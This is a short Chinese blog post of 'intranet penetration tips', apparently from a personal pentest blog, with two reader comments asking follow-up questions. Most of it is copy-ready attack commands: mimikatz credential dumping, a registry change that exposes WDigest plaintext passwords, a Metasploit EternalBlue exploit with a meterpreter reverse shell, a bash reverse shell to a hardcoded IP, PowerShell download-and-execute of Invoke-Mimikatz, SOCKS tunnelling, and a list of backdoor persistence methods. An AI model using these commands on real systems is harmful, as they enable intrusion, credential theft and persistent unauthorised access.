内网渗透的tips

作者: admin 分类: 渗透测试 发布时间: 2017-07-19 12:10

privilege::debug 

misc::memssp 

记录的结果在c:\windows\system32\mimilsa.log 

windows2012修改注册表抓明文 

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 

Web Proxy Auto-Discovery Protocol,WPAD 

搞内网第一是抓域管账号,第二是种金钥匙,第三是最好能点几台域里的机器的马。

use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.0.1-192.168.0.254
set ShowProgress false
set ConnectTimeout 5
set threads 16
services -r tcp -p 445 -R
run

use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.0.160
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.0.86

C:\Recovery\ew.exe -s rssocks -d xx.xx.xx.xx -e 8888

./ew_for_linux64 -s rcsocks -l 1080 -e 8888 

bash反弹

bash -i >& /dev/tcp/106.15.202.18/8081 0>&1

powershell

PowerShell.exe -ExecutionPolicy Bypass -File xxx.ps1 

mimikatz

powershell -Exec Bypass IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1’); Invoke-Mimikatz

powershell -Exec Bypass IEX (New-Object Net.WebClient).DownloadString(‘https://github.com/samratashok/nishang/blob/master/Gather/Invoke-Mimikatz.ps1’); Invoke-Mimikatz

nmap -sS -Pn -T4 -v -p 0-65535 192.168.1.0/24

masscan 0.0.0.0/0 -p0-65535 -oX scan.xml

后门技巧:

劫持WAF的 dll

shift后门

powershell配合计划任务

2条评论
  • 路人甲

    2017年8月1日 上午11:29

    “windows2012修改注册表抓明文 ” 需要重启服务器才能生效,然而重启服务器有时候会有你意想不到的事情发生。请问,如何安全地重启服务器或者不用重启也能抓密码的姿势

  • test

    2017年9月15日 上午10:11

    劫持WAF的 dll
    and
    powershell配合计划任务

    给个网页或者技术文章~ 不太明白

发表评论

电子邮件地址不会被公开。 必填项已用*标注

标签云